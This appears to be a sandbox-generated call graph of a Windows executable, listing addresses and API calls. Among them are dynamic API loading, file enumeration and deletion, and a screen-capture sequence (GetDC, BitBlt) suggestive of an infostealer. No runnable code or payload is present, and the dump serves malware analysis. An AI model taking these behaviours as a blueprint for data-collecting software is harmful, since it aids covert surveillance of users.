62215->62216 62220 1424f25 __alloca_probe_16 ___scrt_fastfail 62215->62220 62216->62220 62224 142169d 62217->62224 62218 1424f8a 62229 140ce8a HeapFree GetLastError ~collate 62218->62229 62220->62218 62221 142741f __fassign MultiByteToWideChar 62220->62221 62222 1424f73 62221->62222 62222->62218 62223 1424f7a GetStringTypeW 62222->62223 62223->62218 62225 1412f3e __cftof 35 API calls 62224->62225 62226 14216b0 62225->62226 62230 14214b3 62226->62230 62229->62213 62231 14214ce __Strxfrm 62230->62231 62232 142741f __fassign MultiByteToWideChar 62231->62232 62236 1421512 62232->62236 62233 1421677 62234 140e288 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 62233->62234 62235 142168a 62234->62235 62235->62207 62236->62233 62237 142255c std::_Locinfo::_W_Getdays 3 API calls 62236->62237 62239 1421537 __alloca_probe_16 62236->62239 62237->62239 62238 142741f __fassign MultiByteToWideChar 62241 142157d 62238->62241 62239->62238 62242 14215b3 62239->62242 62241->62242 62244 142255c std::_Locinfo::_W_Getdays 3 API calls 62241->62244 62246 14215fd __alloca_probe_16 62241->62246 62255 140ce8a HeapFree GetLastError ~collate 62242->62255 62243 1421668 62254 140ce8a HeapFree GetLastError ~collate 62243->62254 62244->62246 62246->62243 62251 142749b 62246->62251 62248 142165f 62248->62243 62249 1421694 62248->62249 62256 140ce8a HeapFree GetLastError ~collate 62249->62256 62252 14274b4 WideCharToMultiByte 62251->62252 62252->62248 62254->62242 62255->62233 62256->62242 62258 1412c95 62257->62258 62259 1412c87 QueryPerformanceCounter 62257->62259 62258->62017 62259->62258 62262 13b8f67 numpunct 62260->62262 62264 13b8fc9 62262->62264 63008 1412cca 62262->63008 63011 13cdf67 62262->63011 62265 13ccca4 62264->62265 62266 13cccfc 62265->62266 62267 13cccc8 62265->62267 62266->62021 62267->62266 63067 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62267->63067 63068 13cd9c4 62269->63068 62271 13ce92b 62271->62023 62273 13b341a 62272->62273 63077 13f6531 62273->63077 62275 13b3454 62277 13b3465 62275->62277 63110 13b29c2 19 API calls 2 library calls 62275->63110 62276 13b3422 62276->62275 63094 13b32c1 62276->63094 62277->62025 62282 13b32a4 62281->62282 63235 13f6087 CreateDirectoryW 62282->63235 62285 13b32b0 62285->62027 62289 13ccd37 62288->62289 62291 13ccd6a 62288->62291 62289->62291 63248 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62289->63248 62291->62029 63249 13b8347 62292->63249 62294 13b83dc 62295 13b3507 62294->62295 62296 13b3574 LoadLibraryA 62295->62296 62299 13b353f 62295->62299 62298 13b35a3 62296->62298 62306 13b35c2 62296->62306 63264 13b39f5 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62298->63264 62299->62296 63263 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62299->63263 62300 13b3621 LoadLibraryA 62309 13b3650 62300->62309 62312 13b36b8 62300->62312 62302 13b35a8 GetProcAddress 62302->62306 62306->62300 63265 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62306->63265 62307 13b3732 LoadLibraryA 62308 13b37f0 62307->62308 62317 13b374a 62307->62317 62318 13b3847 62308->62318 63267 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62308->63267 62311 13b365c GetProcAddress 62309->62311 62310 13b3717 62310->62307 62310->62310 62315 13b366a 62311->62315 62312->62310 63266 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62312->63266 62314 13b3862 LoadLibraryA 62322 13b387a 62314->62322 62334 13b3930 62314->62334 62319 13b367b GetProcAddress 62315->62319 62316 13b3760 GetProcAddress 62321 13b3779 62316->62321 62317->62316 62318->62314 62318->62318 62336 13b3689 62319->62336 62329 13b3780 GetProcAddress 62321->62329 62325 13b3890 GetProcAddress 62322->62325 62323 13b39a2 LoadLibraryA 62326 13b39f0 62323->62326 62327 13b39b6 62323->62327 62324 13b398c 62324->62323 62324->62324 62330 13b38a9 62325->62330 62360 13c674b 62326->62360 63271 13b412b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62327->63271 62335 13b3793 62329->62335 62340 13b38b0 GetProcAddress 62330->62340 62331 13b369a GetProcAddress 62333 13b36a8 62331->62333 62343 13b36af GetProcAddress 62333->62343 62334->62324 63270 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62334->63270 62344 13b379a GetProcAddress 62335->62344 62336->62331 62336->62336 62337 13b39bb 62338 13b39c2 GetProcAddress 62337->62338 63272 13b419f EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62338->63272 62341 13b38c3 62340->62341 62347 13b38ca GetProcAddress 62341->62347 62343->62312 62349 13b37ad 62344->62349 62345 13b39db 62348 13b39e2 GetProcAddress 62345->62348 62346 13b37be GetProcAddress 62352 13b37d1 62346->62352 62353 13b38dd 62347->62353 62348->62326 62349->62346 62349->62349 62350 13b37e2 GetProcAddress 62350->62308 62351 13b38ee GetProcAddress 63268 13b404b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62351->63268 62352->62350 62352->62352 62353->62351 62353->62353 62355 13b3901 62356 13b3908 GetProcAddress 62355->62356 63269 13b40bf EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62356->63269 62358 13b391b 62359 13b3922 GetProcAddress 62358->62359 62359->62334 62364 13c6755 numpunct 62360->62364 62361 13c67c6 63273 13ce8c7 62361->63273 62363 13c67f7 63278 13b3174 62363->63278 62364->62361 63309 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62364->63309 62368 13cdd77 18 API calls 62369 13c6830 62368->62369 62370 13c683a 62369->62370 62371 13c69f1 62369->62371 63284 13b2e70 62370->63284 63325 13cef47 62371->63325 62374 13c6882 62376 13cdd77 18 API calls 62374->62376 62375 13c69ef 63305 13cdf41 62375->63305 62379 13c688d 62376->62379 62380 13c68d0 62379->62380 63310 13b16cb 21 API calls 62379->63310 62382 13c69ac 62380->62382 62392 13cdf41 collate 18 API calls 62380->62392 62393 13cdd77 18 API calls 62380->62393 63294 13b2a7c 62380->63294 63300 13b2ebb 62380->63300 63311 13ce5d4 62380->63311 63315 13ce143 62380->63315 63318 13ce0ab 62380->63318 63322 13cee65 19 API calls 2 library calls 62380->63322 62384 13c69b7 62382->62384 63323 13b16cb 21 API calls 62382->63323 62386 13c69c3 62384->62386 63324 13b16cb 21 API calls 62384->63324 62388 13cdf41 collate 18 API calls 62386->62388 62388->62375 62392->62380 62393->62380 62398 13cbcdb numpunct 62396->62398 62402 13cbd46 62398->62402 63354 13b8f20 62398->63354 64129 13ceb79 19 API calls 4 library calls 62398->64129 62400 13cbdb7 64125 13ccf2d 62400->64125 62402->62400 63357 13b9294 62402->63357 63503 13bc9ec 62402->63503 63529 13cb7c3 62402->63529 63564 13caa32 62402->63564 63579 13bd397 62402->63579 63642 13bd88b 62402->63642 63703 13bddc0 62402->63703 63758 13be23e 62402->63758 63828 13be85f 62402->63828 63883 13becb9 62402->63883 63946 13bf1a2 62402->63946 64009 13bf68f 62402->64009 64064 13bfb09 62402->64064 62418 13c3e85 numpunct 62417->62418 64695 141534a 62418->64695 62422 13c3eb4 62423 1412c70 QueryPerformanceCounter 62422->62423 62424 13c3ebe GetModuleHandleA GetModuleFileNameA 62423->62424 62425 13c3f1d 62424->62425 62427 13c3f50 62424->62427 62425->62427 64756 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62425->64756 62428 13c3fd9 62427->62428 64757 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62427->64757 62432 13c4057 62428->62432 64758 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62428->64758 62431 13c40d5 62433 13ce917 19 API calls 62431->62433 62432->62431 64759 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62432->64759 62435 13c4133 62433->62435 62436 13ce917 19 API calls 62435->62436 62437 13c4148 62436->62437 62438 13ce917 19 API calls 62437->62438 62439 13c415d 62438->62439 62440 13cdf41 collate 18 API calls 62439->62440 62441 13c41b5 62440->62441 62442 13cdf41 collate 18 API calls 62441->62442 63004->62037 63005->62037 63006->62037 63007->62037 63009 142049b _unexpected 35 API calls 63008->63009 63010 1412ccf 63009->63010 63010->62262 63012 13cdf8e 63011->63012 63013 13cdf73 63011->63013 63015 13cf518 63012->63015 63013->62262 63016 13cf539 63015->63016 63017 13cf5ba 63015->63017 63024 13cf70f 63016->63024 63035 13b12de 19 API calls 2 library calls 63017->63035 63019 13cf5bf 63021 13cf555 _LStrxfrm 63023 13cf58f _LStrxfrm 63021->63023 63031 13cf6e3 63021->63031 63023->63013 63025 13cf71c 63024->63025 63026 13cf725 63024->63026 63036 13cff77 63025->63036 63028 13cf731 63026->63028 63050 140dc67 63026->63050 63028->63021 63029 13cf722 63029->63021 63032 13cf6f0 63031->63032 63034 13cf6fd _Deallocate 63031->63034 63066 13b12ba 18 API calls 2 library calls 63032->63066 63034->63023 63035->63019 63037 13cff88 63036->63037 63038 13b1267 Concurrency::cancel_current_task 63036->63038 63039 140dc67 numpunct 19 API calls 63037->63039 63060 1410ef8 RaiseException 63038->63060 63040 13cff8e 63039->63040 63041 13cff95 63040->63041 63062 14134c5 18 API calls 2 library calls 63040->63062 63041->63029 63043 13b1283 63061 13b11d7 18 API calls ___std_exception_copy 63043->63061 63046 13b1292 63046->63029 63047 1413548 63048 1413556 std::_Locinfo::_W_Getdays 11 API calls 63047->63048 63049 1413555 63048->63049 63052 140dc6c _Yarn 63050->63052 63051 140dc86 63051->63029 63052->63051 63055 13b1267 Concurrency::cancel_current_task 63052->63055 63065 141d068 EnterCriticalSection LeaveCriticalSection numpunct 63052->63065 63054 140dc92 63054->63054 63055->63054 63063 1410ef8 RaiseException 63055->63063 63057 13b1283 63064 13b11d7 18 API calls ___std_exception_copy 63057->63064 63059 13b1292 63059->63029 63060->63043 63061->63046 63062->63047 63063->63057 63064->63059 63065->63052 63066->63034 63067->62266 63069 13cd9ce 63068->63069 63069->63069 63072 13ce052 63069->63072 63071 13cd9e0 63071->62271 63073 13ce068 std::locale::_Locimp::_Makeushloc 63072->63073 63074 13ce092 63072->63074 63073->63071 63076 13cf62f 19 API calls 4 library calls 63074->63076 63076->63073 63078 13f6573 63077->63078 63079 13f65da 63078->63079 63080 13f6579 RemoveDirectoryW 63078->63080 63111 13f64fd CreateFileW 63079->63111 63082 13f6594 GetLastError 63080->63082 63086 13f6586 63080->63086 63083 13f65b4 GetLastError 63082->63083 63084 13f65a1 DeleteFileW 63082->63084 63083->63086 63085 13f65ae GetLastError 63084->63085 63084->63086 63085->63083 63086->62276 63089 13f65f6 63114 13f5d9c 63089->63114 63090 13f6636 GetLastError 63091 13f6643 63090->63091 63091->63089 63092 13f666a SetFileInformationByHandle 63091->63092 63092->63089 63093 13f6670 GetLastError 63092->63093 63093->63089 63095 13b32cb numpunct 63094->63095 63127 13ce75f 63095->63127 63097 13b33b8 63105 13b33c7 63097->63105 63154 13b16cb 21 API calls 63097->63154 63098 13b339d 63107 13b33a9 63098->63107 63153 13b16cb 21 API calls 63098->63153 63100 13b3381 63100->63097 63100->63098 63103 13f6531 46 API calls 63103->63105 63104 13b32c1 64 API calls 63109 13b32ee 63104->63109 63105->63103 63105->63107 63106 13f6531 46 API calls 63106->63109 63107->62275 63109->63097 63109->63098 63109->63100 63109->63104 63109->63106 63141 13b2b2d 63109->63141 63145 13b2b95 63109->63145 63112 13f652a 63111->63112 63113 13f6522 GetLastError 63111->63113 63112->63089 63112->63090 63113->63112 63115 13f5da5 CloseHandle 63114->63115 63116 13f5db2 63114->63116 63115->63116 63117 13f5db6 63115->63117 63116->63086 63120 1416ace 63117->63120 63121 1416ada _unexpected 63120->63121 63122 142049b _unexpected 35 API calls 63121->63122 63125 1416adf 63122->63125 63126 141cf95 35 API calls std::locale::_Setgloballocale 63125->63126 63128 13ce769 numpunct 63127->63128 63155 13b2caf 63128->63155 63131 13ce7da 63159 13f6107 63131->63159 63132 140dc67 numpunct 19 API calls 63134 13ce795 63132->63134 63176 13b2dfb 19 API calls numpunct 63134->63176 63135 13ce7e8 63172 13cdd77 63135->63172 63138 13ce7c4 63138->63131 63177 13b16cb 21 API calls 63138->63177 63142 13b2b57 63141->63142 63143 13b2b4e 63141->63143 63216 13f61b5 63142->63216 63143->63109 63147 13b2ba4 63145->63147 63146 13f60e6 ___std_fs_directory_iterator_advance@8 2 API calls 63146->63147 63147->63146 63148 13b2bd7 63147->63148 63149 13b2bd5 63147->63149 63151 13b2bcb 63147->63151 63148->63149 63234 13b16cb 21 API calls 63148->63234 63149->63109 63233 13b2d2b 19 API calls 2 library calls 63151->63233 63153->63107 63154->63105 63156 13b2cb9 numpunct 63155->63156 63178 13b2bf0 63156->63178 63160 13f611d 63159->63160 63161 13f6110 FindClose 63159->63161 63160->63135 63161->63160 63162 13f6121 63161->63162 63163 1416ace _unexpected 35 API calls 63162->63163 63164 13f6126 63163->63164 63165 13f6107 ___std_fs_directory_iterator_open@12 35 API calls 63164->63165 63166 13f6136 FindFirstFileExW 63165->63166 63167 13f6150 GetLastError 63166->63167 63168 13f617f 63166->63168 63169 13f615b 63167->63169 63170 13f6160 FindFirstFileExW 63167->63170 63168->63135 63169->63168 63169->63170 63170->63168 63171 13f6177 GetLastError 63170->63171 63171->63168 63173 13cdd82 63172->63173 63174 13cdd91 63172->63174 63175 13cf6e3 _Deallocate 18 API calls 63173->63175 63174->63109 63175->63174 63176->63138 63177->63131 63180 13b2bfa numpunct 63178->63180 63179 13b2c88 63179->63131 63179->63132 63180->63179 63188 13b206f 63180->63188 63182 13b2c48 63183 13cdd77 18 API calls 63182->63183 63184 13b2c50 63183->63184 63197 13f6127 63184->63197 63186 13b2c64 63186->63179 63205 13f60e6 FindNextFileW 63186->63205 63190 13b2085 63188->63190 63189 13b2135 63189->63182 63190->63189 63191 13b216a 63190->63191 63194 13b2179 63190->63194 63208 13cd813 63191->63208 63193 13b2177 63214 13cd834 19 API calls 63193->63214 63194->63193 63213 13cd7d4 19 API calls 63194->63213 63198 13f6107 ___std_fs_directory_iterator_open@12 40 API calls 63197->63198 63199 13f6136 FindFirstFileExW 63198->63199 63200 13f617f 63199->63200 63201 13f6150 GetLastError 63199->63201 63200->63186 63202 13f615b 63201->63202 63203 13f6160 FindFirstFileExW 63201->63203 63202->63200 63202->63203 63203->63200 63204 13f6177 GetLastError 63203->63204 63204->63200 63206 13f60fd GetLastError 63205->63206 63207 13f60f9 63205->63207 63206->63207 63207->63186 63209 13cd82e 63208->63209 63210 13cd821 63208->63210 63215 13ce2ac 19 API calls 63209->63215 63210->63193 63213->63193 63214->63189 63217 13f621f 63216->63217 63219 13f6270 GetLongPathNameW 63217->63219 63224 13f628c 63217->63224 63225 13f6223 63217->63225 63218 140e288 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 63220 13f64ef 63218->63220 63222 13f6281 GetLastError 63219->63222 63219->63224 63220->63143 63221 13f64fd ___std_fs_open_handle@16 2 API calls 63232 13f62ee 63221->63232 63222->63225 63223 13f5d9c ___std_fs_copy_file@12 36 API calls 63223->63225 63224->63221 63224->63225 63225->63218 63226 13f6422 GetFileInformationByHandle 63227 13f6435 63226->63227 63228 13f6353 GetLastError 63226->63228 63229 13f647c FindFirstFileExW 63227->63229 63230 13f641b 63227->63230 63228->63230 63229->63228 63231 13f64a2 FindClose 63229->63231 63230->63223 63231->63230 63232->63226 63232->63228 63232->63230 63233->63149 63234->63149 63236 13f60a6 GetLastError 63235->63236 63239 13b32ac 63235->63239 63237 13f60b8 63236->63237 63236->63239 63238 13f61b5 44 API calls 63237->63238 63238->63239 63239->62285 63240 13b290a 63239->63240 63241 13b2916 __EH_prolog2 63240->63241 63246 13b2525 19 API calls numpunct 63241->63246 63243 13b2954 63247 1410ef8 RaiseException 63243->63247 63245 13b2965 63246->63243 63247->63245 63248->62291 63250 13b8351 numpunct 63249->63250 63251 140dc67 numpunct 19 API calls 63250->63251 63252 13b835f 63251->63252 63257 13b774b 63252->63257 63255 140dc67 numpunct 19 API calls 63256 13b83a3 _Deallocate 63255->63256 63256->62294 63258 13b7757 63257->63258 63262 13b778b 63257->63262 63259 13b7771 CreateFileMappingA 63258->63259 63258->63262 63260 13b7792 MapViewOfFile 63259->63260 63259->63262 63261 13b77a8 CloseHandle 63260->63261 63260->63262 63261->63262 63262->63255 63262->63256 63263->62296 63264->62302 63265->62300 63266->62310 63267->62318 63268->62355 63269->62358 63270->62324 63271->62337 63272->62345 63274 13ce8dd 63273->63274 63274->63274 63277 13ce8f1 63274->63277 63335 13b12de 19 API calls 2 library calls 63274->63335 63276 13ce916 63277->62363 63336 13b3254 63278->63336 63280 13b318c 63281 13b31ad 63280->63281 63340 13b29c2 19 API calls 2 library calls 63280->63340 63281->62368 63285 13b2e75 numpunct 63284->63285 63286 13ce75f 47 API calls 63285->63286 63287 13b2e95 63286->63287 63288 13b2e9a 63287->63288 63289 13b290a 19 API calls 63287->63289 63288->62374 63293 13b16cb 63289->63293 63290 13b2b95 21 API calls 63290->63293 63292 13b16f0 63292->62374 63293->63290 63293->63292 63341 13b2839 19 API calls 4 library calls 63293->63341 63295 13b2b2d 44 API calls 63294->63295 63297 13b2a94 63295->63297 63296 13b2aaa 63296->62380 63297->63296 63298 13b290a 19 API calls 63297->63298 63299 13b2ac5 63298->63299 63301 13b2b95 21 API calls 63300->63301 63304 13b16cb 63301->63304 63303 13b16f0 63303->62380 63304->63300 63304->63303 63342 13b2839 19 API calls 4 library calls 63304->63342 63306 13cdf4c 63305->63306 63307 13c6a52 63305->63307 63308 13cf6e3 _Deallocate 18 API calls 63306->63308 63307->62037 63308->63307 63309->62361 63310->62380 63312 13ce5e3 63311->63312 63343 13ce603 63312->63343 63314 13ce5f7 63314->62380 63316 13cdf41 collate 18 API calls 63315->63316 63317 13ce14f 63316->63317 63317->62380 63319 13ce0c6 63318->63319 63320 13cf70f messages 19 API calls 63319->63320 63321 13ce0d8 _LStrxfrm 63319->63321 63320->63321 63321->62380 63322->62380 63323->62384 63324->62386 63326 13cef51 numpunct 63325->63326 63327 13cef74 63326->63327 63328 13cefd3 63326->63328 63333 13cefbf 63326->63333 63352 13cf99a 19 API calls 2 library calls 63327->63352 63353 13cf7b8 19 API calls collate 63328->63353 63331 13cef7b 63331->63333 63334 13ce0ab messages 19 API calls 63331->63334 63333->62375 63334->63331 63335->63276 63337 13b326e 63336->63337 63338 13f61b5 44 API calls 63337->63338 63339 13b327e 63338->63339 63339->63280 63341->63293 63342->63304 63344 13ce60d numpunct 63343->63344 63345 13ce67a 63344->63345 63346 13ce68b 63344->63346 63347 13ce643 ___std_fs_convert_wide_to_narrow 63344->63347 63345->63314 63351 13b14ec 19 API calls Concurrency::cancel_current_task 63346->63351 63347->63345 63348 13ce655 63347->63348 63350 13ce668 ___std_fs_convert_wide_to_narrow 63348->63350 63350->63345 63351->63345 63352->63331 63355 1412cca 35 API calls 63354->63355 63356 13b8f2b 63355->63356 63356->62398 63358 13b929e numpunct 63357->63358 63362 13b9318 63358->63362 64139 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63358->64139 63360 13b939e 64130 13cbb72 63360->64130 63362->63360 64140 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63362->64140 63364 13b93db 63365 13ba1c1 63364->63365 63367 13b8f5d 36 API calls 63364->63367 63366 13cdf41 collate 18 API calls 63365->63366 63368 13ba1cc 63366->63368 63369 13b940b 63367->63369 63368->62402 63370 13b8f5d 36 API calls 63369->63370 63371 13b941f 63370->63371 63372 13ce8c7 19 API calls 63371->63372 63373 13b943a 63372->63373 63374 13ce917 19 API calls 63373->63374 63375 13b9469 63374->63375 63376 13cdf41 collate 18 API calls 63375->63376 63377 13b9489 63376->63377 63378 13cdf41 collate 18 API calls 63377->63378 63379 13b9494 63378->63379 63380 13cdf41 collate 18 API calls 63379->63380 63381 13b949f 63380->63381 63382 13cdf41 collate 18 API calls 63381->63382 63383 13b94aa 63382->63383 63384 13cdf41 collate 18 API calls 63383->63384 63385 13b94b9 63384->63385 63386 13b8f5d 36 API calls 63385->63386 63387 13b94c7 63386->63387 63388 13b8f5d 36 API calls 63387->63388 63506 13bc9f6 numpunct 63503->63506 63504 13bca74 63505 13ce0ab messages 19 API calls 63504->63505 63507 13bcad1 63505->63507 63506->63504 64586 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63506->64586 64575 13c6592 63507->64575 63510 13bd368 63512 13cdf41 collate 18 API calls 63510->63512 63511 13ce0ab messages 19 API calls 63517 13bcadc 63511->63517 63513 13bd388 63512->63513 63513->62402 63514 13cd8d6 19 API calls 63514->63517 63515 13ce143 18 API calls 63515->63517 63516 13b3174 45 API calls 63516->63517 63517->63510 63517->63511 63517->63514 63517->63515 63517->63516 63518 13b16cb 21 API calls 63517->63518 63519 13b2ebb 21 API calls 63517->63519 63520 13ce8c7 19 API calls 63517->63520 63521 13b2e70 47 API calls 63517->63521 63522 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63517->63522 63523 13b2a7c 45 API calls 63517->63523 63524 13cdf41 18 API calls collate 63517->63524 63525 13ce5d4 21 API calls 63517->63525 63526 13cdd77 18 API calls 63517->63526 63527 13ce917 19 API calls 63517->63527 63528 13b83df 46 API calls 63517->63528 63518->63517 63519->63517 63520->63517 63521->63517 63522->63517 63523->63517 63524->63517 63525->63517 63526->63517 63527->63517 63528->63517 63530 13cb7cd numpunct 63529->63530 63531 13cb9c1 63530->63531 63532 13b8f5d 36 API calls 63530->63532 63531->62402 63533 13cb7f8 63532->63533 63534 13b8f5d 36 API calls 63533->63534 63535 13cb80c 63534->63535 63536 13ce8c7 19 API calls 63535->63536 63537 13cb827 63536->63537 63538 13ce917 19 API calls 63537->63538 63539 13cb856 63538->63539 63540 13cdf41 collate 18 API calls 63539->63540 63541 13cb873 63540->63541 63542 13cdf41 collate 18 API calls 63541->63542 63543 13cb87e 63542->63543 63544 13cdf41 collate 18 API calls 63543->63544 63545 13cb889 63544->63545 63546 13cdf41 collate 18 API calls 63545->63546 63547 13cb894 63546->63547 63548 13cdf41 collate 18 API calls 63547->63548 63549 13cb8a3 KiUserCallbackDispatcher GetSystemMetrics GetDC 63548->63549 63550 13cb8cf SelectObject BitBlt 63549->63550 64588 13b4619 63550->64588 63555 13cb957 63556 13cb96c DeleteDC DeleteObject ReleaseDC 63555->63556 64597 13cb9d6 63556->64597 63558 13cb997 63559 13b83df 46 API calls 63558->63559 63560 13cb9ae 63559->63560 64601 13b46e3 63560->64601 63565 13caa3c numpunct 63564->63565 64614 13ca518 63565->64614 63567 13caed2 63567->62402 63568 13caeb0 FreeLibrary 63568->63567 63570 13caa47 63570->63567 63570->63568 63572 13cd9c4 19 API calls 63570->63572 63573 13cdd77 18 API calls 63570->63573 63574 13ca933 62 API calls 63570->63574 63575 13ce917 19 API calls 63570->63575 63576 13cd9e5 19 API calls 63570->63576 63577 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63570->63577 63578 13cdf41 18 API calls collate 63570->63578 64646 13caede EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63570->64646 63572->63570 63573->63570 63574->63570 63575->63570 63576->63570 63577->63570 63578->63570 63580 13bd3a1 numpunct 63579->63580 63581 13b8f5d 36 API calls 63580->63581 63582 13bd3c0 63581->63582 63583 13b8f5d 36 API calls 63582->63583 63584 13bd3d3 63583->63584 63585 13ce8c7 19 API calls 63584->63585 63586 13bd3ee 63585->63586 63587 13ce917 19 API calls 63586->63587 63588 13bd41c 63587->63588 63589 13cdf41 collate 18 API calls 63588->63589 63590 13bd43f 63589->63590 63591 13cdf41 collate 18 API calls 63590->63591 63592 13bd447 63591->63592 63593 13cdf41 collate 18 API calls 63592->63593 63594 13bd452 63593->63594 63595 13cdf41 collate 18 API calls 63594->63595 63596 13bd45d 63595->63596 63597 13cdf41 collate 18 API calls 63596->63597 63599 13bd46c 63597->63599 63598 13bd4cb 63601 13ce917 19 API calls 63598->63601 63599->63598 64654 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63599->64654 63602 13bd528 63601->63602 63603 13cdf41 collate 18 API calls 63602->63603 63604 13bd538 63603->63604 63605 13bd583 63604->63605 64655 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63604->64655 63606 13b3174 45 API calls 63605->63606 63607 13bd5d6 63606->63607 63609 13cdd77 18 API calls 63607->63609 63611 13bd5e4 63609->63611 63610 13cdf41 collate 18 API calls 63612 13bd869 63610->63612 63613 13b2e70 47 API calls 63611->63613 63635 13bd812 63611->63635 63615 13bd615 63613->63615 63617 13cdd77 18 API calls 63615->63617 63620 13bd61d 63617->63620 63635->63610 63643 13bd895 numpunct 63642->63643 63644 13b8f5d 36 API calls 63643->63644 63645 13bd8b4 63644->63645 63646 13b8f5d 36 API calls 63645->63646 63647 13bd8c7 63646->63647 63648 13ce8c7 19 API calls 63647->63648 63649 13bd8e2 63648->63649 63650 13ce917 19 API calls 63649->63650 63651 13bd910 63650->63651 63652 13cdf41 collate 18 API calls 63651->63652 63653 13bd933 63652->63653 63654 13cdf41 collate 18 API calls 63653->63654 63655 13bd93b 63654->63655 63656 13cdf41 collate 18 API calls 63655->63656 63657 13bd946 63656->63657 63658 13cdf41 collate 18 API calls 63657->63658 63659 13bd951 63658->63659 63660 13cdf41 collate 18 API calls 63659->63660 63662 13bd960 63660->63662 63661 13bd9db 63663 13ce917 19 API calls 63661->63663 63662->63661 64659 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63662->64659 63664 13bda2d 63663->63664 63665 13cdf41 collate 18 API calls 63664->63665 63667 13bda3a 63665->63667 63668 13b3174 45 API calls 63667->63668 63669 13bda98 63668->63669 63670 13cdd77 18 API calls 63669->63670 63672 13bdaa6 63670->63672 63671 13bdcc5 63673 13cdf41 collate 18 API calls 63671->63673 63672->63671 63674 13b2e70 47 API calls 63672->63674 63675 13bdd1c 63673->63675 63676 13bdad7 63674->63676 63677 13cdf41 collate 18 API calls 63675->63677 63679 13cdd77 18 API calls 63676->63679 63682 13bdadf 63679->63682 63683 13bdb2b 63682->63683 64660 13b16cb 21 API calls 63682->64660 63704 13bddca numpunct 63703->63704 63705 13b8f5d 36 API calls 63704->63705 63706 13bdde1 63705->63706 63707 13b8f5d 36 API calls 63706->63707 63708 13bddf6 63707->63708 63709 13ce8c7 19 API calls 63708->63709 63710 13bde13 63709->63710 63711 13ce917 19 API calls 63710->63711 63712 13bde42 63711->63712 63713 13cdf41 collate 18 API calls 63712->63713 63714 13bde5f 63713->63714 63715 13cdf41 collate 18 API calls 63714->63715 63716 13bde6a 63715->63716 63717 13cdf41 collate 18 API calls 63716->63717 63718 13bde75 63717->63718 63719 13cdf41 collate 18 API calls 63718->63719 63720 13bde80 63719->63720 63721 13cdf41 collate 18 API calls 63720->63721 63722 13bde8c 63721->63722 63724 13bdeee 63722->63724 64663 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63722->64663 63730 13bdf66 63724->63730 64664 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63724->64664 63726 13bdffc 63727 13cbb72 20 API calls 63726->63727 63728 13be039 63727->63728 63729 13ce917 19 API calls 63728->63729 63731 13be04f 63729->63731 63730->63726 64665 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63730->64665 63732 13cdf41 collate 18 API calls 63731->63732 63734 13be05d 63732->63734 63735 13b3174 45 API calls 63734->63735 63736 13be088 63735->63736 63737 13cdd77 18 API calls 63736->63737 63738 13be09a 63737->63738 63759 13be248 numpunct 63758->63759 63760 13b8f5d 36 API calls 63759->63760 63761 13be267 63760->63761 63762 13b8f5d 36 API calls 63761->63762 63763 13be27a 63762->63763 63764 13ce8c7 19 API calls 63763->63764 63765 13be295 63764->63765 63766 13ce917 19 API calls 63765->63766 63767 13be2c3 63766->63767 63768 13cdf41 collate 18 API calls 63767->63768 63769 13be2e6 63768->63769 63770 13cdf41 collate 18 API calls 63769->63770 63771 13be2ee 63770->63771 63772 13cdf41 collate 18 API calls 63771->63772 63773 13be2f9 63772->63773 63774 13cdf41 collate 18 API calls 63773->63774 63775 13be304 63774->63775 63776 13cdf41 collate 18 API calls 63775->63776 63778 13be313 63776->63778 63777 13be375 63780 13ce917 19 API calls 63777->63780 63778->63777 64667 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63778->64667 63781 13be3d2 63780->63781 63782 13cdf41 collate 18 API calls 63781->63782 63783 13be3e2 63782->63783 63786 13be433 63783->63786 64668 140db47 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent 